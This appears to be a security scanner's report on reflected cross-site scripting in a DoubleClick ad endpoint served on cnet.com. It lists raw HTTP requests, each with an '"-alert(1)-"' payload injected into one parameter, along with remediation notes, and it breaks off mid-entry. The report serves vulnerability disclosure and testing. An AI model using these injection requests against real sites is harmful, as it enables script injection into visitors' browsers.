GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=54f109"-alert(1)-"d9fd11bfd28&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efa1a"-alert(1)-"e0b3d5aee59 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0efa1a"-alert(1)-"e0b3d5aee59&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb6f7"-alert(1)-"367490e803e was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=cb6f7"-alert(1)-"367490e803e&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fc88"-alert(1)-"f8894e94b96 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=5fc88"-alert(1)-"f8894e94b96&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcd34"-alert(1)-"06cd0426f9b was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3fcd34"-alert(1)-"06cd0426f9b&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7f5a"-alert(1)-"c05029232b4 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=b7f5a"-alert(1)-"c05029232b4&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dea67"-alert(1)-"667d66c1504 was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=dea67"-alert(1)-"667d66c1504 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] --> <!-- Copyright 2006 DoubleClick Inc., All rights reserved. --> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCF ...[SNIP]... &pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=dea67"-alert(1)-"667d66c1504http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBSi_63094144_240360897_41852066"); var wmode = "opaque"; var bg = "same as SWF"; var dca ...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dbe8"-alert(1)-"7ccee170db7 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn4dbe8"-alert(1)-"7ccee170db7&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97c91"-alert(1)-"12af05d6124 was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US97c91"-alert(1)-"12af05d6124&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76e70"-alert(1)-"5f8ba91465f was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=176e70"-alert(1)-"5f8ba91465f&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5e94"-alert(1)-"672982ddc8e was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253af5e94"-alert(1)-"672982ddc8e&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c8d5"-alert(1)-"1adcf2285e9 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=9c8d5"-alert(1)-"1adcf2285e9&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2eaae"-alert(1)-"b85f9dd3226 was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com2eaae"-alert(1)-"b85f9dd3226&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd82a"-alert(1)-"527f20e513 was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2cd82a"-alert(1)-"527f20e513&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6142"-alert(1)-"256dabadf78 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.comf6142"-alert(1)-"256dabadf78&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e15d"-alert(1)-"86cedb662e5 was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@6e15d"-alert(1)-"86cedb662e5&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/?tag=hdr;brandnav User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 904b8"-alert(1)-"9c8a7d52c2b was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
